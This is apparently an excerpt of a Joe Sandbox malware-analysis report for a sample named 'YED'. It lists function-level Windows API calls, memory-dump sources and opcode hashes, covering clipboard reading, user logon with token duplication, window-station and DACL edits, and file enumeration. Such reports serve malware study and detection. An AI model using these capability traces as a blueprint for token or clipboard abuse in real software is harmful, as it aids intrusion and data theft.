                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InfoParametersSystem
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3098949447-0
                                                                                                                                                • Opcode ID: 9d8edaa66bf0d57f85305a81de76b189912025cc34347705034425a56d15a6a1
                                                                                                                                                • Instruction ID: b8d2a3d7b9bf0a8ebf5aab62fa176ab5279e0799d613d512b71a994a616bb274
                                                                                                                                                • Opcode Fuzzy Hash: 9d8edaa66bf0d57f85305a81de76b189912025cc34347705034425a56d15a6a1
                                                                                                                                                • Instruction Fuzzy Hash: CBC09B352C0344DFF2144780BD8EF107754E348B00F944001F6097D5E3C7B11820D650
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00215745: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00215773
                                                                                                                                                • GetLastError.KERNEL32(00000002,00000000), ref: 002876DE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateErrorFileLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1214770103-0
                                                                                                                                                • Opcode ID: 2ae8eeab81141972dc06e809034aeaeaa7cebcd649b96db030e94ef754577b6c
                                                                                                                                                • Instruction ID: 25e7b7f26904bf4f70280b0b6378bcf5cb6b83b5819e4fa314aaedd2617dfc15
                                                                                                                                                • Opcode Fuzzy Hash: 2ae8eeab81141972dc06e809034aeaeaa7cebcd649b96db030e94ef754577b6c
                                                                                                                                                • Instruction Fuzzy Hash: 6081F1342297019FC714EF28C491AA9B3E5BF98300F14456DF8995B2E2DB30EDA4CF92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                • Instruction ID: e53871c892490df35fb937634024e7100e05f554429e4b80c7fd6e4752fb46d1
                                                                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                • Instruction Fuzzy Hash: 1B310674A1011AABD758CF99E690969F7B1FF49300B2482B6E809CB752D731EDE1CBC0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00229BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00229BB2
                                                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 002A961A
                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002A965B
                                                                                                                                                • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 002A969F
                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002A96C9
                                                                                                                                                • SendMessageW.USER32 ref: 002A96F2
                                                                                                                                                • GetKeyState.USER32(00000011), ref: 002A978B
                                                                                                                                                • GetKeyState.USER32(00000009), ref: 002A9798
                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002A97AE
                                                                                                                                                • GetKeyState.USER32(00000010), ref: 002A97B8
                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002A97E9
                                                                                                                                                • SendMessageW.USER32 ref: 002A9810
                                                                                                                                                • SendMessageW.USER32(?,00001030,?,002A7E95), ref: 002A9918
                                                                                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 002A992E
                                                                                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 002A9941
                                                                                                                                                • SetCapture.USER32(?), ref: 002A994A
                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 002A99AF
                                                                                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002A99BC
                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 002A99D6
                                                                                                                                                • ReleaseCapture.USER32 ref: 002A99E1
                                                                                                                                                • GetCursorPos.USER32(?), ref: 002A9A19
                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 002A9A26
                                                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 002A9A80
                                                                                                                                                • SendMessageW.USER32 ref: 002A9AAE
                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 002A9AEB
                                                                                                                                                • SendMessageW.USER32 ref: 002A9B1A
                                                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 002A9B3B
                                                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 002A9B4A
                                                                                                                                                • GetCursorPos.USER32(?), ref: 002A9B68
                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 002A9B75
                                                                                                                                                • GetParent.USER32(?), ref: 002A9B93
                                                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 002A9BFA
                                                                                                                                                • SendMessageW.USER32 ref: 002A9C2B
                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 002A9C84
                                                                                                                                                • TrackPopupMenuEx.USER32 ref: 002A9CB4
                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 002A9CDE
                                                                                                                                                • SendMessageW.USER32 ref: 002A9D01
                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 002A9D4E
                                                                                                                                                • TrackPopupMenuEx.USER32 ref: 002A9D82
                                                                                                                                                  • Part of subcall function 00229944: GetWindowLongW.USER32(?,000000EB), ref: 00229952
                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 002A9E05
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                                                • String ID: @GUI_DRAGID$F$p#.
                                                                                                                                                • API String ID: 3429851547-937396290
                                                                                                                                                • Opcode ID: a1a5f1595924ff8359a1c2b7bfb224fd3781551a97604a58a576c8cadaa1e73a
                                                                                                                                                • Instruction ID: 6afb493ba5878830b353c114947476335c2776e8426238414fad6b4f180f3f4c
                                                                                                                                                • Opcode Fuzzy Hash: a1a5f1595924ff8359a1c2b7bfb224fd3781551a97604a58a576c8cadaa1e73a
                                                                                                                                                • Instruction Fuzzy Hash: 3D42AF34614241AFD724CF25DC88EAABBE9FF8A710F200619F659872A1DB71D8B4CF51
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 002A48F3
                                                                                                                                                • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 002A4908
                                                                                                                                                • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 002A4927
                                                                                                                                                • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 002A494B
                                                                                                                                                • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 002A495C
                                                                                                                                                • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 002A497B
                                                                                                                                                • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 002A49AE
                                                                                                                                                • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 002A49D4
                                                                                                                                                • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 002A4A0F
                                                                                                                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 002A4A56
                                                                                                                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 002A4A7E
                                                                                                                                                • IsMenu.USER32(?), ref: 002A4A97
                                                                                                                                                • GetMenuItemInfoW.USER32 ref: 002A4AF2
                                                                                                                                                • GetMenuItemInfoW.USER32 ref: 002A4B20
                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 002A4B94
                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 002A4BE3
                                                                                                                                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 002A4C82
                                                                                                                                                • wsprintfW.USER32 ref: 002A4CAE
                                                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002A4CC9
                                                                                                                                                • GetWindowTextW.USER32 ref: 002A4CF1
                                                                                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 002A4D13
                                                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002A4D33
                                                                                                                                                • GetWindowTextW.USER32 ref: 002A4D5A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                                                                • String ID: %d/%02d/%02d
                                                                                                                                                • API String ID: 4054740463-328681919
                                                                                                                                                • Opcode ID: f236cae54946c4617d6b6634b48a66734a0784ede5f780007d0704156b61b22c
                                                                                                                                                • Instruction ID: 95699d8ac82c11b9496c22f32373367133e119846621792dd646ee06b18a2513
                                                                                                                                                • Opcode Fuzzy Hash: f236cae54946c4617d6b6634b48a66734a0784ede5f780007d0704156b61b22c
                                                                                                                                                • Instruction Fuzzy Hash: CA120231620215AFEB25AF24DC49FAE7BF8AF86710F104129F915EA2E1DFB4D950CB50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 002716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0027170D
                                                                                                                                                  • Part of subcall function 002716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0027173A
                                                                                                                                                  • Part of subcall function 002716C3: GetLastError.KERNEL32 ref: 0027174A
                                                                                                                                                • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00271286
                                                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 002712A8
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 002712B9
                                                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002712D1
                                                                                                                                                • GetProcessWindowStation.USER32 ref: 002712EA
                                                                                                                                                • SetProcessWindowStation.USER32 ref: 002712F4
                                                                                                                                                • OpenDesktopW.USER32 ref: 00271310
                                                                                                                                                  • Part of subcall function 002710BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002711FC), ref: 002710D4
                                                                                                                                                  • Part of subcall function 002710BF: CloseHandle.KERNEL32(?), ref: 002710E9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                • String ID: $default$winsta0$Z-
                                                                                                                                                • API String ID: 22674027-3054849001
                                                                                                                                                • Opcode ID: 022dc057954556f95f74928e9954dc2f62c9682c23a4cdb40cfdcb5288e552ae
                                                                                                                                                • Instruction ID: 6cd19b745ef50f7d26400e0bfd3eacf1f0120e0859a5cedc86557a29380135d7
                                                                                                                                                • Opcode Fuzzy Hash: 022dc057954556f95f74928e9954dc2f62c9682c23a4cdb40cfdcb5288e552ae
                                                                                                                                                • Instruction Fuzzy Hash: 5281AF7191020AAFDF219FA8DC49FEE7BB9EF05704F148129F918A61A0DB708964CF60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 002710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00271114
                                                                                                                                                  • Part of subcall function 002710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 00271120
                                                                                                                                                  • Part of subcall function 002710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 0027112F
                                                                                                                                                  • Part of subcall function 002710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 00271136
                                                                                                                                                  • Part of subcall function 002710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0027114D
                                                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00270BCC
                                                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00270C00
                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00270C17
                                                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00270C51
                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00270C6D
                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00270C84
                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00270C8C
                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00270C93
                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00270CB4
                                                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00270CBB
                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00270CEA
                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00270D0C
                                                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00270D1E
                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00270D45
                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00270D4C
                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00270D55
                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00270D5C
                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00270D65
                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00270D6C
                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00270D78
                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00270D7F
                                                                                                                                                  • Part of subcall function 00271193: GetProcessHeap.KERNEL32(00000008,00270BB1,?,00000000,?,00270BB1,?), ref: 002711A1
                                                                                                                                                  • Part of subcall function 00271193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00270BB1,?), ref: 002711A8
                                                                                                                                                  • Part of subcall function 00271193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00270BB1,?), ref: 002711B7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4175595110-0
                                                                                                                                                • Opcode ID: b56a1218e9f42137b3874696181422bfe70dcab77d8c667182e2f3c1a2e0dc07
                                                                                                                                                • Instruction ID: 8ad556af6feab6ce9997c9092dc9f885812e84f4832ecaa8e5875e82bc0fe313
                                                                                                                                                • Opcode Fuzzy Hash: b56a1218e9f42137b3874696181422bfe70dcab77d8c667182e2f3c1a2e0dc07
                                                                                                                                                • Instruction Fuzzy Hash: 84715E7191020AEBDF10DFA4DC89FAEBBB8FF05310F148525F919A6291DB71A919CF60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • OpenClipboard.USER32(002ACC08), ref: 0028EB29
                                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0028EB37
                                                                                                                                                • GetClipboardData.USER32 ref: 0028EB43
                                                                                                                                                • CloseClipboard.USER32 ref: 0028EB4F
                                                                                                                                                • GlobalLock.KERNEL32 ref: 0028EB87
                                                                                                                                                • CloseClipboard.USER32 ref: 0028EB91
                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0028EBBC
                                                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0028EBC9
                                                                                                                                                • GetClipboardData.USER32 ref: 0028EBD1
                                                                                                                                                • GlobalLock.KERNEL32 ref: 0028EBE2
                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?), ref: 0028EC22
                                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000F), ref: 0028EC38
                                                                                                                                                • GetClipboardData.USER32 ref: 0028EC44
                                                                                                                                                • GlobalLock.KERNEL32 ref: 0028EC55
                                                                                                                                                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0028EC77
                                                                                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0028EC94
                                                                                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0028ECD2
                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0028ECF3
                                                                                                                                                • CountClipboardFormats.USER32 ref: 0028ED14
                                                                                                                                                • CloseClipboard.USER32 ref: 0028ED59
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 420908878-0
                                                                                                                                                • Opcode ID: b47f3396a2949740bf5953141ccf839dd1da4066c5ccaac03a0d80e35bf0eaea
                                                                                                                                                • Instruction ID: c4e8d7f1e38a0d444e582051ec53179d4493905a0befa21f3a36c837d3391b7e
                                                                                                                                                • Opcode Fuzzy Hash: b47f3396a2949740bf5953141ccf839dd1da4066c5ccaac03a0d80e35bf0eaea
                                                                                                                                                • Instruction Fuzzy Hash: 3161EE782143029FD700EF20D888F6AB7E8AF95714F194519F856872E2DF30D959CFA2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 002869BE
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00286A12
                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00286A4E
                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00286A75
                                                                                                                                                  • Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD
                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00286AB2
                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00286ADF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                • API String ID: 3830820486-3289030164
                                                                                                                                                • Opcode ID: 6182303b19680c45ebd033aad3d48a5149a976a5d5ad1b7a5855b5681772edea
                                                                                                                                                • Instruction ID: 26ebaef20e0b2cc474a3bde585cf5a2f7e7243dcfe719507f80d523a83e32b60
                                                                                                                                                • Opcode Fuzzy Hash: 6182303b19680c45ebd033aad3d48a5149a976a5d5ad1b7a5855b5681772edea
                                                                                                                                                • Instruction Fuzzy Hash: 7BD16F72518300AFC314EBA0D895EAFB7ECAF98704F04492EF585D7191EB74DA94CB62
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00289663
                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 002896A1
                                                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 002896BB
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 002896D3
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 002896DE
                                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 002896FA
                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0028974A
                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(002D6B7C), ref: 00289768
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00289772
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0028977F
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0028978F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                • String ID: *.*
